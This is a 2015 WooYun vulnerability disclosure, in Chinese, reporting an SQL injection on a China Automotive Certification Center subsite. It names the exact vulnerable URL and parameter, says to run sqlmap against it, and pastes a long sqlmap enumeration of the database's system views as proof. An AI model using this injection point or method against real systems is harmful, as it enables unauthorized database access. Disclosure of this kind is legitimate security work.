漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0142555
漏洞标题:中国汽车认证中心分站SQL注入漏洞
相关厂商:中国汽车认证中心
漏洞作者: 坏小子
提交时间:2015-09-22 11:21
修复时间:2015-11-06 11:22
公开时间:2015-11-06 11:22
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:2
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-06: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国汽车认证中心分站注入漏洞 求个邀请码,多乌云多机会
详细说明:
注入点 http://coc.cccap.org.cn/auto_web/coc_para_manage/report_paraList.aspx?ent=8100 直接扔sqlmap
跑一下master看看 擦 仅仅一个master就这么庞大 我也不跑了,雷人 里面肯定会有有用信息 证明漏洞确实存在即可 master部分截图和全部数据
| sys.dm_broker_activated_tasks | | sys.dm_broker_connections | | sys.dm_broker_forwarded_messages | | sys.dm_broker_queue_monitors | | sys.dm_cdc_errors | | sys.dm_cdc_log_scan_sessions | | sys.dm_clr_appdomains | | sys.dm_clr_loaded_assemblies | | sys.dm_clr_properties | | sys.dm_clr_tasks | | sys.dm_cryptographic_provider_properties | | sys.dm_database_encryption_keys | | sys.dm_db_file_space_usage | | sys.dm_db_index_usage_stats | | sys.dm_db_mirroring_auto_page_repair | | sys.dm_db_mirroring_connections | | sys.dm_db_mirroring_past_actions | | sys.dm_db_missing_index_details | | sys.dm_db_missing_index_group_stats | | sys.dm_db_missing_index_groups | | sys.dm_db_partition_stats | | sys.dm_db_persisted_sku_features | | sys.dm_db_script_level | | sys.dm_db_session_space_usage | | sys.dm_db_task_space_usage | | sys.dm_exec_background_job_queue | | sys.dm_exec_background_job_queue_stats | | sys.dm_exec_cached_plans | | sys.dm_exec_connections | | sys.dm_exec_procedure_stats | | sys.dm_exec_query_memory_grants | | sys.dm_exec_query_optimizer_info | | sys.dm_exec_query_resource_semaphores | | sys.dm_exec_query_stats | | sys.dm_exec_query_transformation_stats | | sys.dm_exec_requests | | sys.dm_exec_sessions | | sys.dm_exec_trigger_stats | | sys.dm_filestream_file_io_handles | | sys.dm_filestream_file_io_requests | | sys.dm_fts_active_catalogs | | sys.dm_fts_fdhosts | | sys.dm_fts_index_population | | sys.dm_fts_memory_buffers | | sys.dm_fts_memory_pools | | sys.dm_fts_outstanding_batches | | sys.dm_fts_population_ranges | | sys.dm_io_backup_tapes | | sys.dm_io_cluster_shared_drives | | sys.dm_io_pending_io_requests | | sys.dm_os_buffer_descriptors | | sys.dm_os_child_instances | | sys.dm_os_cluster_nodes | | sys.dm_os_dispatcher_pools | | sys.dm_os_dispatchers | | sys.dm_os_hosts | | sys.dm_os_latch_stats | | sys.dm_os_loaded_modules | | sys.dm_os_memory_allocations | | sys.dm_os_memory_brokers | | sys.dm_os_memory_cache_clock_hands | | sys.dm_os_memory_cache_counters | | sys.dm_os_memory_cache_entries | | sys.dm_os_memory_cache_hash_tables | | sys.dm_os_memory_clerks | | sys.dm_os_memory_node_access_stats | | sys.dm_os_memory_nodes | | sys.dm_os_memory_objects | | sys.dm_os_memory_pools | | sys.dm_os_nodes | | sys.dm_os_performance_counters | | sys.dm_os_process_memory | | sys.dm_os_ring_buffers | | sys.dm_os_schedulers | | sys.dm_os_spinlock_stats | | sys.dm_os_stacks | | sys.dm_os_sublatches | | sys.dm_os_sys_info | | sys.dm_os_sys_memory | | sys.dm_os_tasks | | sys.dm_os_threads | | sys.dm_os_virtual_address_dump | | sys.dm_os_wait_stats | | sys.dm_os_waiting_tasks | | sys.dm_os_worker_local_storage | | sys.dm_os_workers | | sys.dm_qn_subscriptions | | sys.dm_repl_articles | | sys.dm_repl_schemas | | sys.dm_repl_tranhash | | sys.dm_repl_traninfo | | sys.dm_resource_governor_configuration | | sys.dm_resource_governor_resource_pools | | sys.dm_resource_governor_workload_groups | | sys.dm_server_audit_status | | sys.dm_tran_active_snapshot_database_transactions | | sys.dm_tran_active_transactions | | sys.dm_tran_commit_table | | sys.dm_tran_current_snapshot | | sys.dm_tran_current_transaction | | sys.dm_tran_database_transactions | | sys.dm_tran_locks | | sys.dm_tran_session_transactions | | sys.dm_tran_top_version_generators | | sys.dm_tran_transactions_snapshot | | sys.dm_tran_version_store | | sys.dm_xe_map_values | | sys.dm_xe_object_columns | | sys.dm_xe_objects | | sys.dm_xe_packages | | sys.dm_xe_session_event_actions | | sys.dm_xe_session_events | | sys.dm_xe_session_object_columns | | sys.dm_xe_session_targets | | sys.dm_xe_sessions | | sys.endpoint_webmethods | | sys.endpoints | | sys.event_notification_event_types | | sys.event_notifications | | sys.events | | sys.extended_procedures | | sys.extended_properties | | sys.filegroups | | sys.foreign_key_columns | | sys.foreign_keys | | sys.fulltext_catalogs | | sys.fulltext_document_types | | sys.fulltext_index_catalog_usages | | sys.fulltext_index_columns | | sys.fulltext_index_fragments | | sys.fulltext_indexes | | sys.fulltext_languages | | sys.fulltext_stoplists | | sys.fulltext_stopwords | | sys.fulltext_system_stopwords | | sys.function_order_columns | | sys.http_endpoints | | sys.identity_columns | | sys.index_columns | | sys.indexes | | sys.internal_tables | | sys.key_constraints | | sys.key_encryptions | | sys.linked_logins | | sys.login_token | | sys.master_files | | sys.master_key_passwords | | sys.message_type_xml_schema_collection_usages | | sys.messages | | sys.module_assembly_usages | | sys.numbered_procedure_parameters | | sys.numbered_procedures | | sys.objects | | sys.openkeys | | sys.parameter_type_usages | | sys.parameter_xml_schema_collection_usages | | sys.parameters | | sys.partition_functions | | sys.partition_parameters | | sys.partition_range_values | | sys.partition_schemes | | sys.partitions | | sys.plan_guides | | sys.procedures | | sys.remote_logins | | sys.remote_service_bindings | | sys.resource_governor_configuration | | sys.resource_governor_resource_pools | | sys.resource_governor_workload_groups | | sys.routes | | sys.schemas | | sys.securable_classes | | sys.server_assembly_modules | | sys.server_audit_specification_details | | sys.server_audit_specifications | | sys.server_audits | | sys.server_event_notifications | | sys.server_event_session_actions | | sys.server_event_session_events | | sys.server_event_session_fields | | sys.server_event_session_targets | | sys.server_event_sessions | | sys.server_events | | sys.server_file_audits | | sys.server_permissions | | sys.server_principal_credentials | | sys.server_principals | | sys.server_role_members | | sys.server_sql_modules | | sys.server_trigger_events | | sys.server_triggers | | sys.servers | | sys.service_broker_endpoints | | sys.service_contract_message_usages | | sys.service_contract_usages | | sys.service_contracts | | sys.service_message_types | | sys.service_queue_usages | | sys.service_queues | | sys.services | | sys.soap_endpoints | | sys.spatial_index_tessellations | | sys.spatial_indexes | | sys.spatial_reference_systems | | sys.sql_dependencies | | sys.sql_expression_dependencies | | sys.sql_logins | | sys.sql_modules | | sys.stats | | sys.stats_columns | | sys.symmetric_keys | | sys.synonyms | | sys.sysaltfiles | | sys.syscacheobjects | | sys.syscharsets | | sys.syscolumns | | sys.syscomments | | sys.sysconfigures | | sys.sysconstraints | | sys.syscurconfigs | | sys.syscursorcolumns | | sys.syscursorrefs | | sys.syscursors | | sys.syscursortables | | sys.sysdatabases | | sys.sysdepends | | sys.sysdevices | | sys.sysfilegroups | | sys.sysfiles | | sys.sysforeignkeys | | sys.sysfulltextcatalogs | | sys.sysindexes | | sys.sysindexkeys | | sys.syslanguages | | sys.syslockinfo | | sys.syslogins | | sys.sysmembers | | sys.sysmessages | | sys.sysobjects | | sys.sysoledbusers | | sys.sysopentapes | | sys.sysperfinfo | | sys.syspermissions | | sys.sysprocesses | | sys.sysprotects | | sys.sysreferences | | sys.sysremotelogins | | sys.sysservers | | sys.system_columns | | sys.system_components_surface_area_configuration | | sys.system_internals_allocation_units | | sys.system_internals_partition_columns | | sys.system_internals_partitions | | sys.system_objects | | sys.system_parameters | | sys.system_sql_modules | | sys.system_views | | sys.systypes | | sys.sysusers | | sys.table_types | | sys.tables | | sys.tcp_endpoints | | sys.trace_categories | | sys.trace_columns | | sys.trace_event_bindings | | sys.trace_events | | sys.trace_subclass_values | | sys.traces | | sys.transmission_queue | | sys.trigger_event_types | | sys.trigger_events | | sys.triggers | | sys.type_assembly_usages | | sys.types | | sys.user_token | | sys.via_endpoints | | sys.views | | sys.xml_indexes | | sys.xml_schema_attributes | | sys.xml_schema_collections | | sys.xml_schema_component_placements | | sys.xml_schema_components | | sys.xml_schema_elements | | sys.xml_schema_facets | | sys.xml_schema_model_groups | | sys.xml_schema_namespaces | | sys.xml_schema_types | | sys.xml_schema_wildcard_namespaces | | sys.xml_schema_wildcards | +---------------------------------------------------+
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 坏小子@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝